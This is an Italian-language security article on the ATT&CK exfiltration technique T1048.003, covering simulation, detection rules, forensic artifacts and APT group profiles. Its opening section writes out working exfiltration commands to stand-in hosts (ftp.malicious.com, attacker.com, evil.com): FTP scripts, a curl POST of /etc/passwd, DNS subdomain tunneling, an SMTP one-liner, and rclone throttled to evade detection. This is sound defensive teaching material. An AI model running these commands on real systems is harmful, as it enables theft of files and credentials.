Exfiltration Over Unencrypted: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003)

Per simulare efficacemente questa tecnica in ambiente di test, iniziamo con l'esfiltrazione base via FTP. Su Windows, dopo aver raccolto dati sensibili in un archivio:

echo open ftp.malicious.com 21 > ftpcmd.txt echo anonymous >> ftpcmd.txt echo pass@fake.com >> ftpcmd.txt echo binary >> ftpcmd.txt echo put sensitive_data.zip >> ftpcmd.txt echo quit >> ftpcmd.txt ftp -s:ftpcmd.txt

Su Linux, l'approccio può essere più sofisticato utilizzando curl per trasferimenti HTTP con dati codificati. Prima comprimi e codifica i dati target:

tar -czf - /etc/passwd /home//Documents/* | base64 | curl -X POST -d @- http://attacker.com/upload.php*

Per simulare il comportamento di APT32, che codifica dati nel campo subdomain delle query DNS, puoi utilizzare questo script Python:

import base64
import subprocess

data = open("sensitive.txt", "rb").read()
encoded = base64.b64encode(data).decode()
chunks = [encoded[i:i+63] for i in range(0, len(encoded), 63)]

for chunk in chunks:
    subprocess.run(["nslookup", f"{chunk}.evil.com"])

Su macOS, l'esfiltrazione può sfruttare comandi nativi del sistema. Il gruppo Dok utilizza curl per trasferire log via FTP:

curl -T /tmp/execution.log ftp://anonymous:fake@attacker.com/uploads/

Per simulare il comportamento di Lazarus Group che genera email SMTP con informazioni delle vittime, crea uno script che interagisce direttamente con server SMTP:

python -c "import smtplib; s=smtplib.SMTP('mail.evil.com',25); s.sendmail('victim@company.com','exfil@evil.com','Subject: Data\n\n$(cat /etc/hosts | base64)')"

Gli strumenti specializzati come Rclone permettono simulazioni più realistiche. Dopo l'installazione, configura un backend FTP o WebDAV e trasferisci interi alberi di directory:

rclone copy /home/user/sensitive_docs remote:backup --transfers 1 --bwlimit 100K

Il parametro bwlimit simula trasferimenti lenti per evitare detection basata su anomalie di banda.

La detection efficace richiede un approccio multilivello che correli eventi di processo, accesso file e traffico di rete. Inizia monitorando la creazione di processi che invocano utility di trasferimento dati.

Per Windows Sysmon, configura regole che catturino EventCode 1 quando il processo padre non è un browser ma il figlio esegue ftp.exe, curl.exe o bitsadmin.exe. Correlalo con EventCode 3 per connessioni di rete verso IP esterni su porte 21, 80 o 53.

Su Linux con AuditD, monitora le syscall execve per comandi come: auditctl -a always,exit -F arch=b64 -S execve -F exe=/usr/bin/curl -F a1="POST" -k exfil_attempt

Per il traffico di rete, Zeek offre detection granulare. Crea uno script che identifichi pattern anomali nei log HTTP:

event http_request(c: connection, method: string, original_URI: string) {
    if (method == "POST" && |original_URI| > 1000) {
        if (base64_decode(original_URI) != "")
            NOTICE([$note=Exfiltration::BASE64_IN_URI]);
    }
}

I falsi positivi rappresentano una sfida significativa. Backup legittimi, sincronizzazioni cloud e trasferimenti di sviluppo generano pattern simili. Implementa whitelist basate su:

• Destinazioni IP/domini autorizzati per trasferimenti FTP/HTTP
• Processi parent-child attesi (es: script di backup schedulati)
• Volumi di trasferimento baseline per utente/sistema

Per ridurre il rumore, correla multiple dimensioni. Un alert ad alta confidenza combina:

• Processo non comune che inizia trasferimento
• Accesso precedente a file/directory sensibili (EventCode 4663)
• Destinazione IP/dominio mai vista prima o registrata recentemente
• Dati con alta entropia o pattern base64 nel payload

Configura threshold dinamici basati sul comportamento normale. Un improvviso picco di trasferimenti FTP da un host che normalmente non li esegue merita investigazione immediata.

La ricostruzione forense di esfiltrazioni via protocolli non cifrati lascia tracce distintive across multiple artifacts. Su Windows, inizia dall'analisi dei Prefetch files che documentano l'esecuzione di ftp.exe, curl.exe o BITSAdmin.exe con timestamp precisi.

Il registro di Windows conserva evidenze critiche in:

• HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs per file acceduti
• HKCU\Software\Microsoft\Internet Explorer\TypedURLs per URL HTTP utilizzati
• Event ID 4656/4663 nel Security log per accessi a file sensibili pre-esfiltrazione

Per sistemi Linux, la ricostruzione temporale inizia da:

• /var/log/auth.log per correlate elevazioni di privilegi
• ~/.bash_history per comandi di compressione/encoding eseguiti
• /var/log/apache2/access.log se il sistema compromesso ospitava servizi web

I network artifacts forniscono la smoking gun. PCAP catturati durante l'incidente rivelano:

• Pattern di trasferimento FTP con comandi USER/PASS/STOR
• HTTP POST con payload base64 negli header o body
• Query DNS anomale con subdomain lunghi contenenti dati encoded

Durante l'analisi della campagna FIN6, i forensic analyst hanno ricostruito l'intera catena attraverso:

1. Timestamp di creazione archivi ZIP in directory temporanee
2. Execution artifacts di legittime utility di sistema per compression
3. Network logs mostranti HTTP POST verso server remoti
4. Payment card data negli archivi trasferiti, confermando il target dell'attacco

Gli ESXi environments presentano sfide uniche. Esamina:

• /var/log/shell.log per comandi eseguiti in sessioni SSH
• /scratch/log/hostd.log per manipolazioni di VM o snapshot
• Datastore browser logs per accessi a VMDK o file di configurazione

La correlazione temporale è cruciale. Mappa:

• T0: Initial file access/collection
• T1: Compression/encoding operation
• T2: Network utility execution
• T3: Outbound transfer initiation
• T4: Transfer completion/cleanup

Strumenti come Plaso o log2timeline automatizzano la creazione di super timeline aggregando tutti questi artifacts in una vista unificata e ricercabile.

L'analisi dei pattern di esfiltrazione rivela signature uniche per gruppo APT. Lazarus Group (Corea del Nord) dimostra preferenza per SMTP, generando email automatiche contenenti informazioni delle nuove vittime infette attraverso il malware SierraBravo-Two. Questo pattern si allinea con la loro infrastruttura C2 distribuita e la necessità di notification asincrone.

OilRig (Iran) utilizza un approccio dual-channel, mantenendo DNS come canale C2 primario mentre sfrutta Microsoft Exchange e FTP per esfiltrazione bulk. Questa separazione indica sophistication operativa e awareness delle tecniche di detection. Le loro campagne recenti mostrano evoluzione verso l'uso di servizi cloud legittimi come dead drop.

APT32 (Vietnam) eccelle nell'uso creativo del DNS tunneling, encodando dati nel campo subdomain. I loro tool mostrano modularità crescente, con componenti dedicati per:

• Compression ottimizzata per DNS (chunk size < 63 caratteri)
• Rotation automatica dei domini per evitare blacklisting
• Fallback su HTTP quando DNS viene bloccato

Mustang Panda (Cina) ha recentemente adottato FTP per trasferire archivi da target diplomatici. L'analisi delle loro infrastrutture rivela:

• Uso di compromised legitimate FTP servers come hop intermedi
• Timing dei trasferimenti allineato con business hours locali per blend-in
• Preference per archivi frammentati per evitare size-based detection

Il trend emergente mostra convergenza verso "living off the cloud". Contagious Interview combina esfiltrazione FTP tradizionale con upload verso servizi legittimi, rendendo la detection significativamente più complessa. Prevediamo evoluzione verso:

• Maggior uso di webhook services per micro-esfiltrazioni
• Steganografia in traffic apparentemente legittimo
• Abuso di piattaforme collaborative aziendali per data staging

Framework MITRE ATT&CK T1048.003. FireEye APT34 Report dicembre 2017 documenta pattern esfiltrazione OilRig. Symantec Elfin marzo 2019 analizza FTP usage APT33. DFIR Report ottobre 2020 conferma Wizard Spider FTP exfiltration durante ransomware. Cisco febbraio 2025 rivela Salt Typhoon TFTP/FTP abuse su network devices compromessi.